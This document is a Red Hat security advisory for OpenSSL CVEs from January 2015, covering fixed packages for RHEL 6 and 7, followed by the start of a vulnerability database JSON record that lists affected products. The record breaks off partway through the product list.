1180184 - CVE-2015-0204 openssl: Only allow ephemeral RSA keys in export ciphersuites 1180185 - CVE-2014-3572 openssl: ECDH downgrade bug fix 1180187 - CVE-2014-8275 openssl: Fix various certificate fingerprint issues 1180234 - CVE-2014-3571 openssl: DTLS segmentation fault in dtls1_get_record 1180235 - CVE-2015-0206 openssl: DTLS memory leak in dtls1_buffer_record 1180239 - CVE-2015-0205 openssl: DH client certificates accepted without verification 1180240 - CVE-2014-3570 openssl: Bignum squaring may produce incorrect results
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional (v. 6):
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-1.0.1e-30.el6_6.5.ppc.rpm openssl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc.rpm openssl-devel-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-1.0.1e-30.el6_6.5.s390.rpm openssl-1.0.1e-30.el6_6.5.s390x.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-devel-1.0.1e-30.el6_6.5.s390.rpm openssl-devel-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
ppc64: openssl-debuginfo-1.0.1e-30.el6_6.5.ppc64.rpm openssl-perl-1.0.1e-30.el6_6.5.ppc64.rpm openssl-static-1.0.1e-30.el6_6.5.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-30.el6_6.5.s390x.rpm openssl-perl-1.0.1e-30.el6_6.5.s390x.rpm openssl-static-1.0.1e-30.el6_6.5.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 6):
Source: openssl-1.0.1e-30.el6_6.5.src.rpm
i386: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-1.0.1e-30.el6_6.5.i686.rpm openssl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-devel-1.0.1e-30.el6_6.5.i686.rpm openssl-devel-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 6):
i386: openssl-debuginfo-1.0.1e-30.el6_6.5.i686.rpm openssl-perl-1.0.1e-30.el6_6.5.i686.rpm openssl-static-1.0.1e-30.el6_6.5.i686.rpm
x86_64: openssl-debuginfo-1.0.1e-30.el6_6.5.x86_64.rpm openssl-perl-1.0.1e-30.el6_6.5.x86_64.rpm openssl-static-1.0.1e-30.el6_6.5.x86_64.rpm
Red Hat Enterprise Linux Client (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Client Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
ppc64: openssl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc.rpm openssl-devel-1.0.1e-34.el7_0.7.ppc64.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc.rpm openssl-libs-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-1.0.1e-34.el7_0.7.s390x.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-devel-1.0.1e-34.el7_0.7.s390.rpm openssl-devel-1.0.1e-34.el7_0.7.s390x.rpm openssl-libs-1.0.1e-34.el7_0.7.s390.rpm openssl-libs-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: openssl-debuginfo-1.0.1e-34.el7_0.7.ppc.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.ppc64.rpm openssl-perl-1.0.1e-34.el7_0.7.ppc64.rpm openssl-static-1.0.1e-34.el7_0.7.ppc.rpm openssl-static-1.0.1e-34.el7_0.7.ppc64.rpm
s390x: openssl-debuginfo-1.0.1e-34.el7_0.7.s390.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.s390x.rpm openssl-perl-1.0.1e-34.el7_0.7.s390x.rpm openssl-static-1.0.1e-34.el7_0.7.s390.rpm openssl-static-1.0.1e-34.el7_0.7.s390x.rpm
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: openssl-1.0.1e-34.el7_0.7.src.rpm
x86_64: openssl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-devel-1.0.1e-34.el7_0.7.i686.rpm openssl-devel-1.0.1e-34.el7_0.7.x86_64.rpm openssl-libs-1.0.1e-34.el7_0.7.i686.rpm openssl-libs-1.0.1e-34.el7_0.7.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: openssl-debuginfo-1.0.1e-34.el7_0.7.i686.rpm openssl-debuginfo-1.0.1e-34.el7_0.7.x86_64.rpm openssl-perl-1.0.1e-34.el7_0.7.x86_64.rpm openssl-static-1.0.1e-34.el7_0.7.i686.rpm openssl-static-1.0.1e-34.el7_0.7.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-3570 https://access.redhat.com/security/cve/CVE-2014-3571 https://access.redhat.com/security/cve/CVE-2014-3572 https://access.redhat.com/security/cve/CVE-2014-8275 https://access.redhat.com/security/cve/CVE-2015-0204 https://access.redhat.com/security/cve/CVE-2015-0205 https://access.redhat.com/security/cve/CVE-2015-0206 https://access.redhat.com/security/updates/classification/#moderate https://www.openssl.org/news/secadv_20150108.txt
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2015 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iD8DBQFUwCWMXlSAg2UNWIIRAioBAJ4/RjG4OGXzCwg+PJJWNqyvahe3rQCeNE+X ENFobdxQdJ+gVAiRe8Qf54A= =wyAg -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201501-0339", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "powerlinux 7r2", "scope": "eq", "trust": 1.2, "vendor": "ibm", "version": "0" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.3.5" }, { "model": "communications core session manager", "scope": "eq", "trust": 1.1, "vendor": "oracle", "version": "7.2.5" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0m" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0n" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0o" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0g" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0b" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1h" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1j" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1a" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0f" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0e" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0c" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1d" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.1i" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0l" }, { "model": "openssl", "scope": "eq", "trust": 1.0, "vendor": "openssl", "version": "1.0.0k" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7200" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7700" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7800" }, { "model": "power", "scope": "eq", "trust": 0.9, "vendor": "ibm", "version": "7100" }, { "model": "hpe systems insight manager", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(x86)" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.63" }, { "model": "fusion middleware", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle mobile security suite mss 3.0" }, { "model": "solaris", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "11.2" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 4.71" }, { "model": "hp virtual connect enterprise manager sdk", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "hpe server migration pack", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.0p" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.1" }, { "model": "openssl", "scope": "lt", "trust": 0.8, "vendor": "openssl", "version": "1.0.0" }, { "model": "hpe insight control", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "none" }, { "model": "mysql", "scope": "lte", "trust": 0.8, "vendor": "oracle", "version": "5.6.22 and earlier" }, { "model": "hpe version control repository manager", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "hp version control agent", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "hpe matrix operating environment", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "hp thinpro linux", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "(arm)" }, { "model": "system management homepage", "scope": null, "trust": 0.8, "vendor": "hewlett packard", "version": null }, { "model": "openssl", "scope": "eq", "trust": 0.8, "vendor": "openssl", "version": "1.0.1k" }, { "model": "hpe insight control", "scope": "eq", "trust": 0.8, "vendor": "hewlett packard", "version": "server provisioning" }, { "model": "virtualization", "scope": "eq", "trust": 0.8, "vendor": "oracle", "version": "of oracle secure global desktop 5.1" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7400" }, { "model": "power express", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5200" }, { "model": "paging server", "scope": "eq", "trust": 0.6, "vendor": "cisco", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "5700" }, { "model": "power", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "7300" }, { "model": "powerlinux 7r1", "scope": "eq", "trust": 0.6, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.6, "vendor": "hp", "version": "7.4" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v70001.1" }, { "model": "cognos controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.3.1" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50007.2.0.5" }, { "model": "mate collector", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "ata series analog terminal adaptor", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1900" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7600" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.1" }, { "model": "video surveillance series ip cameras", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "30000" }, { "model": "bladecenter advanced management module 25r5778", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "power system s822", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.10.186" }, { "model": "telepresence server on virtual machine", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "4.1" }, { "model": "aura collaboration environment", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "3.0" }, { "model": "bladecenter -s", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1948" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "783.00" }, { "model": "power express f/c", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5205635" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.2.6" }, { "model": "upward integration modules scvmm add-in", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "1.0.3" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v35007.2" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.80" }, { "model": "websphere mq", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "flex system p270 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7954-24x)0" }, { "model": "flex system compute node type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x22025850" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "6" }, { "model": "power systems e870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "sbr carrier", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "0" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.4" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "350.50" }, { "model": "san volume controller", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "6.4.1.3" }, { "model": "mysql server", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "5.6" }, { "model": "project openssl 1.0.0d", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "nexus series switches", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "90000" }, { "model": "project openssl 1.0.1e", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "idataplex dx360 m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79120" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "insight orchestration", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.5" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.8.780" }, { "model": "insight control", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "tandberg codian isdn gw", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "32400" }, { "model": "project openssl 1.0.1a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.2.2" }, { "model": "telepresence mcu", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "85100" }, { "model": "thinpro linux", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "(x86)4.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.2" }, { "model": "ip interoperability and collaboration system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "project openssl 1.0.0p", "scope": "ne", "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "edge digital media player", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "3400" }, { "model": "systems insight manager 7.3.0a", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "flex system p260 compute node", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "(7895-23x)0" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.0.0" }, { "model": "project openssl 1.0.0g", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "linux amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "security access manager for mobile", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.0.0.3" }, { "model": "junos os 13.3r6", "scope": "ne", "trust": 0.3, "vendor": "juniper", "version": null }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.5" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37006.4.19" }, { "model": "telepresence server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "70104.1" }, { "model": "insight control server provisioning", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.5.1" }, { "model": "prime security manager 04.8 qa08", "scope": null, "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "740.70" }, { "model": "power systems", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "810.21" }, { "model": "ns oncommand core package", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "sametime", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "9.0.0.1" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "2.1.7" }, { "model": "netscaler t1", "scope": "eq", "trust": 0.3, "vendor": "citrix", "version": "0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0-68" }, { "model": "prime license manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "power systems 350.c0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.1.0.842" }, { "model": "workflow for bluemix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "power", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5750" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "flex system manager node types", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "79550" }, { "model": "upward integration modules for vmware vsphere", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.0.1" }, { "model": "version control repository manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3.0.870" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2-77" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.0" }, { "model": "linux sparc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "telepresence te software", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "-0" }, { "model": "linux enterprise software development kit sp3", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "real-time compression appliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9.1.11" }, { "model": "system m4 type", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "x350073830" }, { "model": "as infinity", "scope": "eq", "trust": 0.3, "vendor": "pexip", "version": "7" }, { "model": "rational insight", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.1.1" }, { "model": "prime network registrar", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "8.2.2.2" }, { "model": "network configuration and change management service", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "systems insight manager sp2", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "4.2" }, { "model": "prime collaboration assurance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0.0.840" }, { "model": "data ontap smi-s agent", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "5.2" }, { "model": "systems insight manager sp1", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "5.0" }, { "model": "telepresence content server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37001.1" }, { "model": "tandberg codian mse model", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "83200" }, { "model": "matrix operating environment", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3" }, { "model": "local collector appliance", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "2.2.8" }, { "model": "power system s814", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "0" }, { "model": "version control agent", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.2" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "3.0.2.77" }, { "model": "system m4 type", 